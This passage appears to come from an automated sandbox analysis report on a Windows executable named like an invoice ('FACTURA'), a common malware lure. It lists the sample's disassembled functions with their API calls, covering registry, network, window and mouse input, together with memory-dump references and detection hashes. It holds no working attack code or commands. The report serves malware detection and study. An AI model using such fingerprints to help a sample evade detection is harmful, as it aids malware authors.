                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EF9EC7
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EF9EDA
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EF9EED
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EF9F00
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EF9F13
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EF9F26
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EF9F39
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EF9F4C
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EF9F5F
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EF9F72
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EF9F85
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EF9F98
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EF9FAB
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EF9FBE
                                                                            • __mtinitlocks.LIBCMT ref: 00EF9AEB
                                                                            • __mtterm.LIBCMT ref: 00EF9AF4
                                                                              • Part of subcall function 00EF9B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00EF9C56
                                                                              • Part of subcall function 00EF9B5C: _free.LIBCMT ref: 00EF9C5D
                                                                              • Part of subcall function 00EF9B5C: RtlDeleteCriticalSection.NTDLL(00F8EC00), ref: 00EF9C7F
                                                                            • __calloc_crt.LIBCMT ref: 00EF9B19
                                                                            • __initptd.LIBCMT ref: 00EF9B3B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00EF9B42
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            • Opcode ID: 49f3f23a5ceb70875c879f085288332f70da58ac528a29e6dfc6769462cc94ca
                                                                            • Instruction ID: 1003e1d476fa3b4f47a6868cac927d1ca942aac15b2609dd46005befd262d017
                                                                            • Opcode Fuzzy Hash: 49f3f23a5ceb70875c879f085288332f70da58ac528a29e6dfc6769462cc94ca
                                                                            • Instruction Fuzzy Hash: B6F0C232619B1D19E73476747C07BBA36D09B02338B202659F7D4F50D7EF6184000264
                                                                            Function 00EF406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EF3F85), ref: 00EF4085
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00EF408C
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 00EF4097
                                                                            • RtlDecodePointer.NTDLL(00EF3F85), ref: 00EF40B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: 76812f64d6dcf90755b436e56ede686e9d40cb9a2dd5467138756cab72388c3c
                                                                            • Instruction ID: 9f715dca09ccd9a9df992021827ef103fb5eb7e887e48f6fc8e8118c8f69be18
                                                                            • Opcode Fuzzy Hash: 76812f64d6dcf90755b436e56ede686e9d40cb9a2dd5467138756cab72388c3c
                                                                            • Instruction Fuzzy Hash: 82E0B6B0981708EFEB61AF61EC0DB163AA4B704787F104066F205E20F0CFB68648FA16
                                                                            Function 00F46B03 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00F46C00
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F46C34
                                                                            • htons.WS2_32(?), ref: 00F46CEA
                                                                            • inet_ntoa.WS2_32(?), ref: 00F46CA7
                                                                              • Part of subcall function 00F2A7E9: _strlen.LIBCMT ref: 00F2A7F3
                                                                              • Part of subcall function 00F2A7E9: _memmove.LIBCMT ref: 00F2A815
                                                                            • _strlen.LIBCMT ref: 00F46D44
                                                                            • _memmove.LIBCMT ref: 00F46DAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3619996494-0
                                                                            • Opcode ID: 59f1febcd6fa2ab253f12d4bb9042ef37c2eb869da270ef0534a58a509703a36
                                                                            • Instruction ID: cee930a6eb840ba11d3cfc3a17e08baa25bc9921a2a5f7db9d40cb2cb38e3828
                                                                            • Opcode Fuzzy Hash: 59f1febcd6fa2ab253f12d4bb9042ef37c2eb869da270ef0534a58a509703a36
                                                                            • Instruction Fuzzy Hash: 3C81C072604300ABC710EB24DC82F6ABBE9EF85724F10491AF955AB2D2DB709D06D752
                                                                            Function 00F364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            • Opcode ID: fc3af12b12bf3c0056c56eb678251284c3d22cbf04ff98c40d813ff119c1a79e
                                                                            • Instruction ID: 9d80fb99b31ff3e3b8af47775d15159e50141b308aa1ce1f51ec825ee7af74a5
                                                                            • Opcode Fuzzy Hash: fc3af12b12bf3c0056c56eb678251284c3d22cbf04ff98c40d813ff119c1a79e
                                                                            • Instruction Fuzzy Hash: 7761AD3590025AABCF05EF60CC82EFE37A5EF45328F048529F955AB293DB34D806EB50
                                                                            Function 00F501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F502BD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F502FD
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F50320
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F50349
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F5038C
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F50399
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
                                                                            • Opcode ID: 3fbb65f5aadc0c6d153f6230e6407ee592cc59d924227486446c2e1d81d3428b
                                                                            • Instruction ID: 54c0484343e16f085154fff1d6705f8891e08329179b41a03b4ae883dc01602d
                                                                            • Opcode Fuzzy Hash: 3fbb65f5aadc0c6d153f6230e6407ee592cc59d924227486446c2e1d81d3428b
                                                                            • Instruction Fuzzy Hash: 08515871508304AFC710EF64C885E6EBBE8FF85314F04491DFA95972A2DB31E909DB52
                                                                            Function 00F55799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 00F557FB
                                                                            • GetMenuItemCount.USER32(00000000), ref: 00F55832
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F5585A
                                                                            • GetMenuItemID.USER32(?,?), ref: 00F558C9
                                                                            • GetSubMenu.USER32(?,?), ref: 00F558D7
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F55928
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                            • String ID:
                                                                            • API String ID: 650687236-0
                                                                            • Opcode ID: 6ea2e6ed756455894f0273951c739930210cc8f2645a66d2314cb6c8f5e84d7e
                                                                            • Instruction ID: 37968119492fcad4d73d8d6e1150ac0a44440861795683d55604d8d124d28392
                                                                            • Opcode Fuzzy Hash: 6ea2e6ed756455894f0273951c739930210cc8f2645a66d2314cb6c8f5e84d7e
                                                                            • Instruction Fuzzy Hash: E7516D35E00619EFCF05EF64C855AAEB7B4EF48721F1440A9EE01BB351CB34AE45AB90
                                                                            Function 00F2EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00F2EF06
                                                                            • VariantClear.OLEAUT32(00000013), ref: 00F2EF78
                                                                            • VariantClear.OLEAUT32(00000000), ref: 00F2EFD3
                                                                            • _memmove.LIBCMT ref: 00F2EFFD
                                                                            • VariantClear.OLEAUT32(?), ref: 00F2F04A
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F2F078
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                            • String ID:
                                                                            • API String ID: 1101466143-0
                                                                            • Opcode ID: a13e6827af693f6feae158b4323caaa6626bf49627e7b4beb1abe4a7fcb306f8
                                                                            • Instruction ID: 8ebe3452a994d6496059070cd48ce1816d0c0ac11ba66140218fad11f2e84382
                                                                            • Opcode Fuzzy Hash: a13e6827af693f6feae158b4323caaa6626bf49627e7b4beb1abe4a7fcb306f8
                                                                            • Instruction Fuzzy Hash: 2E5179B5A00219EFCB10DF58D884AAAB7B8FF4C310B158569EA49DB305E330E915CFA0
                                                                            Function 00F3220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32258
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F322A3
                                                                            • IsMenu.USER32(00000000), ref: 00F322C3
                                                                            • CreatePopupMenu.USER32 ref: 00F322F7
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00F32355
                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F32386
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: 5066f846b308381d0b391d45f89316f45d30032f227aba5ef40b4450da9bedfb
                                                                            • Instruction ID: a43b9542252b5f9bfb559f403722fd11e2db1fb815063f5cc03f6676a43375cb
                                                                            • Opcode Fuzzy Hash: 5066f846b308381d0b391d45f89316f45d30032f227aba5ef40b4450da9bedfb
                                                                            • Instruction Fuzzy Hash: EC51CD30A01309EBDF61CF68D888BAEBBF5BF05334F144169E855AB290E3799904EB51
                                                                            Function 00ED1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00ED179A
                                                                            • GetWindowRect.USER32(?,?), ref: 00ED17FE
                                                                            • ScreenToClient.USER32(?,?), ref: 00ED181B
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ED182C
                                                                            • EndPaint.USER32(?,?), ref: 00ED1876
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 774f9719693b60fb51408bb7145fa270a4cb8cce8c80def2cf66efeeb2a70fb8
                                                                            • Instruction ID: dcedf924c3039281c1d7fa6c26839fa808134c4b358983163dd69159cc7c4b2b
                                                                            • Opcode Fuzzy Hash: 774f9719693b60fb51408bb7145fa270a4cb8cce8c80def2cf66efeeb2a70fb8
                                                                            • Instruction Fuzzy Hash: 9741B330504704AFDB11DF25DC84FBA7BE8EB46724F0446AAF6A4972B1C7319846FB61
                                                                            Function 00F5B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00F957B0,00000000,01142618,?,?,00F957B0,?,00F5B5A8,?,?), ref: 00F5B712
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00F5B736
                                                                            • ShowWindow.USER32(00F957B0,00000000,01142618,?,?,00F957B0,?,00F5B5A8,?,?), ref: 00F5B796
                                                                            • ShowWindow.USER32(00000000,00000004,?,00F5B5A8,?,?), ref: 00F5B7A8
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00F5B7CC
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F5B7EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: ce0ca474de4516ef59157b944b1e6a86c6c82372aa0a3f80dd505450207e506d
                                                                            • Instruction ID: 95feb9116ad1a824231ec70b1acc89727587bfc2cc2bfd05b550aaeb4ab0c216
                                                                            • Opcode Fuzzy Hash: ce0ca474de4516ef59157b944b1e6a86c6c82372aa0a3f80dd505450207e506d
                                                                            • Instruction Fuzzy Hash: 95416734900244AFDB25CF24D499B957BE1FF49322F1841B5EF488F562C731A85ADB51
                                                                            Function 00F4709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00F44E41,?,?,00000000,00000001), ref: 00F470AC
                                                                              • Part of subcall function 00F439A0: GetWindowRect.USER32(?,?), ref: 00F439B3
                                                                            • GetDesktopWindow.USER32 ref: 00F470D6
                                                                            • GetWindowRect.USER32(00000000), ref: 00F470DD
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F4710F
                                                                              • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
                                                                            • GetCursorPos.USER32(?), ref: 00F4713B
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F47199
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 6058056514662d5d06031091f7230db4415b6e6fff6bc7f2377a2129fed3c7cc
                                                                            • Instruction ID: 68bf0b6b8fa45277fb18192ad7dba03ecbf112a6fab4f0d350fb0fc8d6b4f525
                                                                            • Opcode Fuzzy Hash: 6058056514662d5d06031091f7230db4415b6e6fff6bc7f2377a2129fed3c7cc
                                                                            • Instruction Fuzzy Hash: FD31D272509309ABD720EF14CC49F9BBBAAFFC8314F000919F985A7191D734EA09DB92
                                                                            Function 00F3EB23 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
                                                                            • _wcstok.LIBCMT ref: 00F3EC94
                                                                            • _wcscpy.LIBCMT ref: 00F3ED23
                                                                            • _memset.LIBCMT ref: 00F3ED56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            • Opcode ID: 54dd4bd3d5c68560ed59fcd25e2d9455392f5008857feb1f8d2c25205d1fbdb9
                                                                            • Instruction ID: 2acf14aea22cec242d77aaab2d2cf158d2b920b5dac261fdfcca874220b75fbf
                                                                            • Opcode Fuzzy Hash: 54dd4bd3d5c68560ed59fcd25e2d9455392f5008857feb1f8d2c25205d1fbdb9
                                                                            • Instruction Fuzzy Hash: 25C171715087419FC714EF24C885A6AB7E0FF85320F11592EF999A73A2DB70EC46DB42
